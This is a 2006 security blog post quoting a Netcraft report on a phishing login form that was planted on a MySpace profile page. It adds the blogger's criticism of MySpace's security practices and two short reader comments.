Spyware Sucks
“There is no magic fairy dust protecting Macs" – Dai Zovi, author of “The Mac Hacker’s Handbook"

Myspace.com have some very basic problems…

October 28th 2006 in Uncategorized

http://news.netcraft.com/

"Netcraft has discovered that the social networking site, MySpace, appears to have been compromised by phishers who have presented a spoof login form on the main site. This modified login form is designed to submit the victim's username and password to a remote server hosted in France.

Netcraft has notified MySpace of the issue, although it currently remains live. Because the fraudulent login page is hosted on MySpace's own servers and does not exhibit any signs of external content, such as cross-site scripting (XSS) or open redirects, it is convincing and even security-conscious users are at risk of becoming victims. The attack is launched from a profile page, where the username is login_home_index_html, and uses specially-crafted HTML in order to hide the genuine MySpace content from the page and instead display its own login form."

PCWorld have reported that the fraudulent site has been shut down BUT how many users were affected before this occurred?  So far there has been no word on how many users' accounts may have been compromised. 

It remains to be seen why Myspace allowed a user account like "login_home_index_html" to be registered when they have a database of user names that are not permitted.

I block myspace.com on whenever possible on networks in which I have a say about such things because of incidents like the one featured today, and one million PCs being infected via a banner ad and because the myspace login is unencrypted.


2 comments to...
“Myspace.com have some very basic problems…”

Nicholas

Check out my latest blog entry on MySpace, where I ramble about that very thing..

http://www.pdsys.org/blog/2006/10/25/MySpaceSucks.aspx



evas

danger danger danger spy ware all over the place


Thanks to my reader 'attorneyfish' (aka David) who pinged me to let me know about some new articles about Spamhaus.  The first article, on a blog that I read regularly, is:http://internetandclassactionlaw.blogspot.com/2006/10/spamhaus-email-lawsuit-gets.htmlwhich points here:http://www.lawbulletin.com/news/gettoctext.cfm?TOCUID=22147706&SessionID=w016734702829It makes for interesting reading.  This issue has never been simply e360insight v Spamhaus – its implications, as I have said for the […]

Previous Entry

Back on September 19 I mentioned that Alex of the Windows Genuine Advantage blog had been way too quiet, but that he had promised a report on the dangers of using non-genuine (counterfeit or cracked) software.Well, Alex has blogged to let us know that the report has finally been released.  It makes interesting reading.This particular […]

Next Entry

Archives